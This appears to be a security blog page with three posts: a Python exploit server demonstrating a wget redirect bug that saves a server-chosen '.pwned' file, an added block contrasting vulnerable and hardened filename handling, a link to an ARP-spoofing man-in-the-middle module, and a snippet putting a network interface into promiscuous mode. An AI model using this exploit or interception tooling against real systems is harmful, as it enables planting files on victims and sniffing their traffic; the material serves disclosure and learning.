WGET file redirect exploit

While browsing full-disclosure this morning I noticed a vulnerability in WGET and decided to write a working exploit for it to show the issue.

The problem is this: if you request a file, for example:

and the server returns a redirect to, say,

WGET will store the downloaded file under the filename taken from the redirect, ‘malicious_filename’!
Exploit code to test if your system is vulnerable:

from http.server import BaseHTTPRequestHandler, HTTPServer
import time

HOST_NAME = "0.0.0.0"
PORT_NUMBER = 80

TARGET_FILENAME = ".pwned"
TARGET_CONTENT = "VULNERABLE SYSTEM"


class wget_exploit(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path != "/%s" % TARGET_FILENAME:
            # do our redirect: any request that is not for the target name gets bounced to it
            self.send_response(301)  # send the redirect
            self.send_header("Location", TARGET_FILENAME)  # redirect to the target
            self.end_headers()

            self.wfile.write(b"WOOPSPLOIT by XPN (http://xpnsbraindump.blogspot.com)")

        else:
            # send exploited file with new filename
            self.send_response(200)
            self.end_headers()

            self.wfile.write(TARGET_CONTENT.encode())


if __name__ == '__main__':
    httpd = HTTPServer((HOST_NAME, PORT_NUMBER), wget_exploit)
    print(time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER))
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass

    httpd.server_close()
    print(time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER))
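The naming mistake behind the bug, as an added example that is not part of the original post: the vulnerable behaviour takes the local filename from whichever URL the redirect chain ended on, while the hardened version takes it only from the URL the user actually requested and refuses names that would be hidden dotfiles or escape the download directory. The URLs are constructed for illustration.

```python
import posixpath
from urllib.parse import urlsplit, unquote

# Constructed URLs: the file a user asked for, and where the server redirected it to.
REQUESTED_URL = "http://example.invalid/innocent.txt"
REDIRECT_URL = "http://example.invalid/.pwned"


def _last_path_component(url):
    """Decoded last path component of a URL ('' for a bare directory)."""
    return posixpath.basename(unquote(urlsplit(url).path))


def vulnerable_name(requested_url, final_url):
    """Pre-fix behaviour: name the file after the URL the redirect chain ended on,
    so the server, not the user, chooses what gets written to disk."""
    return _last_path_component(final_url)


def is_safe_filename(name):
    """Reject names that are empty, traverse directories, embed separators or NULs,
    or would be created as hidden dotfiles."""
    if name in ("", ".", ".."):
        return False
    if any(c in name for c in "/\\\0"):
        return False
    return not name.startswith(".")


def safe_name(requested_url, final_url, default="index.html"):
    """Hardened behaviour: the local name comes only from the requested URL;
    the redirect target (final_url) never influences it, and unsafe names fall back."""
    name = _last_path_component(requested_url)
    return name if is_safe_filename(name) else default


if __name__ == "__main__":
    print("vulnerable:", vulnerable_name(REQUESTED_URL, REDIRECT_URL))  # .pwned
    print("hardened:  ", safe_name(REQUESTED_URL, REDIRECT_URL))  # innocent.txt
```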


Man In The Middle Python Module

Finally I have finished my first python project. I have created a little module that will allow any python programmer to intercept IP traffic between a host and router on the same subnet using ARP spoofing.

This is my first Python project, so I would be happy to receive any criticisms, comments or feedback (as long as they are constructive).

If you like this, please comment.

Link: http://github.com/xpn/mitm

Python: Add Promiscuous Mode To Interface

So... I started programming in Python this weekend. I had touched on it before but never really given it a fair chance. I spent a while looking for how to set an interface into promiscuous mode for an ARP spoofing tool I’m creating, and while searching couldn’t really find anything.

So here is my little snippet for anyone looking to do the same thing:

import socket
import struct
import fcntl

SIOCGIFFLAGS = 0x8913
SIOCSIFFLAGS = 0x8914
IFF_PROMISC = 0x100

IFNAME = b"eth0"

# raw packet socket (needs root); its descriptor is what the interface ioctls are issued on
sd = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)

# This will return the current flags present on the interface (struct ifreq, name padded with NULs)
ifreq = fcntl.ioctl(sd, SIOCGIFFLAGS, IFNAME + b"\0" * 256)

# extract the current flags field (a short at offset 16, after the 16-byte name) from the struct returned
(current_flags,) = struct.unpack("16xH", ifreq[:18])

# add the Promisc flag
current_flags |= IFF_PROMISC

# create the new struct for setting the interface flags
ifreq = struct.pack("16sH", IFNAME, current_flags)

# call ioctl() to update the flags for the interface
fcntl.ioctl(sd, SIOCSIFFLAGS, ifreq)

# Turn off the IFF_PROMISC flag
current_flags &= ~IFF_PROMISC
ifreq = struct.pack("16sH", IFNAME, current_flags)

# remove the Promisc flag from the interface once done
fcntl.ioctl(sd, SIOCSIFFLAGS, ifreq)
sd.close()

If you think of any other ways to do the above in a more ‘clean’ format, please leave a comment as I would love to know how.